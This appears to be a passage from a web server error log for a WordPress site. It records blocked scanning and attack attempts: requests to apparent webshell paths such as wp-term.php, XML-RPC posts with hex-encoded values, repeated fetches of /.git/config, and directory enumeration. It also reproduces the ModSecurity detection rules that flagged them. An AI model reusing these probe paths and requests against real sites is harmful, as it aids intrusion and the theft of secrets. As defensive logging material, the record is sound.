referer: binance.com [Wed Feb 05 06:46:02.391508 2025] [autoindex:error] [pid 21602:tid 140126789232384] [client 64.227.143.182:50870] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 05 14:37:39.352430 2025] [autoindex:error] [pid 21602:tid 140126822803200] [client 157.245.108.90:41434] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 05 15:00:22.927549 2025] [:error] [pid 21602:tid 140127062157056] [client 212.227.135.39:43298] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-term.php"] [unique_id "Z6PDVsF-9kSMwGlnQSjXAwAAAMA"], referer: https://www.google.com [Wed Feb 05 15:00:27.248766 2025] [:error] [pid 21065:tid 140126906730240] [client 212.227.135.39:43300] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-term.php"] [unique_id "Z6PDW25i_b5B3jUHo0AxvAAAAAo"], referer: https://www.google.com [Wed Feb 05 15:00:29.531132 2025] [:error] [pid 21602:tid 140126822803200] [client 212.227.135.39:43302] [client 212.227.135.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-term.php"] [unique_id "Z6PDXcF-9kSMwGlnQSjXBAAAANQ"], referer: https://www.google.com 2025/02/05 18:11:39 [error] 20925#20925: *257364 access forbidden by rule, client: 79.124.58.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/05 18:11:40 [error] 20924#20924: *257365 access forbidden by rule, client: 79.124.58.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Feb 05 19:09:32.474770 2025] [:error] [pid 21602:tid 140126789232384] [client 217.160.11.27:32834] [client 217.160.11.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-term.php"] [unique_id "Z6P9vMF-9kSMwGlnQSjYHAAAANg"], referer: https://www.google.com [Wed Feb 05 19:09:34.831188 2025] [:error] [pid 21602:tid 140127028586240] [client 217.160.11.27:32840] [client 217.160.11.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-term.php"] [unique_id "Z6P9vsF-9kSMwGlnQSjYHQAAAMQ"], referer: https://www.google.com [Wed Feb 05 19:09:44.549728 2025] [:error] [pid 21602:tid 140126806017792] [client 217.160.11.27:32842] [client 217.160.11.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-term.php"] [unique_id "Z6P9yMF-9kSMwGlnQSjYHgAAANY"], referer: https://www.google.com [Wed Feb 05 20:08:06.825207 2025] [:error] [pid 21602:tid 140126814410496] [client 88.165.172.197:36496] [client 88.165.172.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z6QLdsF-9kSMwGlnQSjYQgAAANU"] [Thu Feb 06 05:22:25.536198 2025] [authz_core:error] [pid 20626:tid 140071634204416] [client 64.226.65.160:50164] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/06 05:22:30 [error] 19906#19906: *263785 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Feb 06 09:12:18.567436 2025] [authz_core:error] [pid 31192:tid 140071533491968] [client 178.128.207.138:37794] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/06 09:12:24 [error] 19907#19907: *265842 access forbidden by rule, client: 178.128.207.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Feb 06 12:26:04.616143 2025] [:error] [pid 31192:tid 140071592240896] [client 213.136.78.38:50502] [client 213.136.78.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6TwrLx1me0gvSy40XwemAAAAQY"], referer: www.google.com [Thu Feb 06 12:26:19.795009 2025] [:error] [pid 19942:tid 140071508313856] [client 213.136.78.38:50506] [client 213.136.78.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6Twu-nza89hP2JqhxjYogAAABA"], referer: www.google.com [Thu Feb 06 19:59:59.723463 2025] [:error] [pid 31192:tid 140071441172224] [client 204.10.194.175:56366] [client 204.10.194.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6VbD7x1me0gvSy40Xwi0QAAARg"], referer: www.google.com [Thu Feb 06 20:00:04.436637 2025] [:error] [pid 20626:tid 140071533491968] [client 204.10.194.175:56380] [client 204.10.194.175] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6VbFJ_pG6VyDL562XVwewAAAM0"], referer: www.google.com [Fri Feb 07 02:37:32.654391 2025] [autoindex:error] [pid 31192:tid 140071550277376] [client 157.245.108.90:51178] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 07 05:51:42.141453 2025] [autoindex:error] [pid 16559:tid 140203041720064] [client 5.45.77.43:53972] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:43.801021 2025] [autoindex:error] [pid 16316:tid 140203189307136] [client 5.45.77.43:53976] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:48.851989 2025] [autoindex:error] [pid 16314:tid 140202932614912] [client 5.45.77.43:53984] AH01276: Cannot serve directory /home/investig/public_html/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/02/07 05:51:52 [error] 16277#16277: *283440 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 5.45.77.43, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2025/02/07 05:51:53 [error] 16276#16276: *283441 "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/vlihsdna/index.html" is not found (2: No such file or directory), client: 5.45.77.43, server: investigacionperu.com, request: "GET /.well-known/pki-validation/vlihsdna/ HTTP/1.1", host: "investigacionperu.com" 2025/02/07 05:51:54 [error] 16276#16276: *283442 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 5.45.77.43, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Fri Feb 07 05:51:54.962898 2025] [autoindex:error] [pid 16316:tid 140203050112768] [client 5.45.77.43:53992] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:55.838959 2025] [autoindex:error] [pid 16316:tid 140203033327360] [client 5.45.77.43:53994] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:56.169011 2025] [autoindex:error] [pid 16315:tid 140203008149248] [client 5.45.77.43:53996] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:56.889394 2025] [autoindex:error] [pid 16314:tid 140203008149248] [client 5.45.77.43:53998] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:57.806706 2025] [autoindex:error] [pid 16314:tid 140203066898176] [client 5.45.77.43:54000] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:58.887653 2025] [autoindex:error] [pid 16314:tid 140203075290880] [client 5.45.77.43:54002] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/crop/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:51:59.767060 2025] [autoindex:error] [pid 16316:tid 140203016541952] [client 5.45.77.43:54004] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:52:00.704368 2025] [autoindex:error] [pid 16315:tid 140203180914432] [client 5.45.77.43:54006] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/dist/development/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:52:03.406619 2025] [autoindex:error] [pid 16315:tid 140202999756544] [client 5.45.77.43:54014] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:52:03.688054 2025] [autoindex:error] [pid 16315:tid 140202932614912] [client 5.45.77.43:54016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:52:04.200256 2025] [autoindex:error] [pid 16315:tid 140203016541952] [client 5.45.77.43:54018] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 07 05:52:05.254460 2025] [autoindex:error] [pid 16315:tid 140202949400320] [client 5.45.77.43:54020] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/02/07 06:48:37 [error] 16277#16277: *283992 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/07 06:53:49 [error] 16277#16277: *284058 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/07 06:58:12 [error] 16276#16276: *284132 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/07 07:22:43 [error] 16276#16276: *284332 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/02/07 07:31:57 [error] 16277#16277: *284369 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/07 07:34:54 [error] 16276#16276: *284384 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/07 07:55:20 [error] 16277#16277: *284476 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/07 09:21:50 [error] 16277#16277: *285314 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/07 10:04:05 [error] 16277#16277: *286027 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/02/07 10:09:01 [error] 16276#16276: *286207 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Feb 07 18:02:30.126959 2025] [:error] [pid 16969:tid 140203016541952] [client 159.65.188.122:59706] [client 159.65.188.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6aRBvVQYHwe6ISxJd6M1gAAAQw"], referer: www.google.com [Fri Feb 07 18:02:31.204049 2025] [:error] [pid 16314:tid 140202991363840] [client 159.65.188.122:59708] [client 159.65.188.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag 